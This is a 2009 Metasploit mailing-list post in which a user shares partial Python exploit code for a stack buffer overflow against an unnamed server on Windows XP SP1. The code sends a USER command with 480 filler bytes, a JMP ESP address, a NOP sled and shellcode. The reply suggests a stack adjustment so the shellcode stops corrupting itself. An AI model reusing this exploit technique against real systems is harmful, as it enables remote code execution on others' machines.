Metasploit mailing list archives
No room for shellcode
From: egypt at metasploit.com (egypt at metasploit.com)
Date: Sat, 2 May 2009 14:28:12 -0600
It is possible that the shellcode is corrupting itself because ESP is too close to EIP. The first thing I would try is to prepend an instruction like "add esp, -3500" to the shellcode. In a regular metasplot module this can be achieved by adding "'StackAdjustment' => -3500" in the Payload section of the info at the top. Hope this helped, egypt On Sat, May 2, 2009 at 10:31 AM, DB Allen <allendb760 at googlemail.com> wrote:
It's not a specific metasploit question - but I did use metasploit to generate the shellcode :-). I trying to write an exploit for a popular server based software but don't have room for the shellcode anywhere. Here is a copy of the stack (doing this on XP SP1. so no DEP): ************?? ***********? ******** 00A4FD40?? 41414141? AAAA 00A4FD44?? 41414141? AAAA 00A4FD48?? 41414141? AAAA 00A4FD4C?? 41414141? AAAA 00A4FD50?? 41414141? AAAA 00A4FD54?? 77D718FC? ? ?w? USER32.77D718FC? -> JMP ESP 00A4FD58?? 90909090 00A4FD5C?? 90909090? ???-> ESP 00A4FD60?? 90909090 00A4FD64?? 90909090 00A4FD68?? 4DEB6AFC? ?j?M?? -> Shellcode start (should be 317 bytes) 00A4FD6C?? FFFFF9E8? ???? 00A4FD70?? 6C8B60FF? ?`?l 00A4FD74?? 458B2424? $$?E 00A4FD78?? 057C8B3C? <?| 00A4FD7C?? 8BEF0178? x ?? 00A4FD80?? 5F8B184F? O ?_ 00A4FD84?? 49EB0120?? ?I 00A4FD88?? 018B348B? ?4? 00A4FD8C?? 99C031EE? ?1?? 00A4FD90?? 74C084AC? ???t 00A4FD94?? 20CAC107? ???? ?-> Shellcode goes tits up. 00A4FD98?? 746E6320???xxxx??? -> Normal program code (obsfucated) 00A4FD9C?? 6C492072? xxxx 00A4FDA0?? 6167656C? xxxx 00A4FDA4?? 7375206C? xxxx 00A4FDA8?? 64697265??xxxx ? Pointer to next SEH record 00A4FDAC??6F4C202E??xxxx? SE handler 00A4FDB0?? 206E6967? xxxx The buffer is 480 bytes to cause the overflow. Here is the relevant bit of Python: #JMP ESP XP SP1 jmp_sp1 = '\xfc\x18\xd7\x77' user = 'USER ' buff = "A" * 480 NOP = '\x90' s.connect(('192.168.2.4', XXXX)) s.recv(1024) while 1: ??? s.send(user + buff + jmp_sp1 + NOP * 16 + shellcode + "\r\n") I'm thinking that I can include the shellcode as part of the buffer and find a static JMP?[ESP-xxx] in memory,?that could send the execution flow back into the buffer and to the shellcode. Is this a normal method to chose? Also is it reliable across OS's of the same service pack? If there is a better way, I'd love to hear it. Thanks, DB _______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework
Current thread:
- No room for shellcode DB Allen (May 02)
- No room for shellcode egypt at metasploit.com (May 02)
- No room for shellcode Patrick Webster (May 03)
- No room for shellcode DB Allen (May 03)
- No room for shellcode H D Moore (May 03)
- No room for shellcode DB Allen (May 03)
- No room for shellcode H D Moore (May 03)
- No room for shellcode DB Allen (May 04)
- No room for shellcode Patrick Webster (May 05)
- No room for shellcode Patrick Webster (May 03)
- No room for shellcode egypt at metasploit.com (May 02)
- No room for shellcode Kim Guldberg (May 03)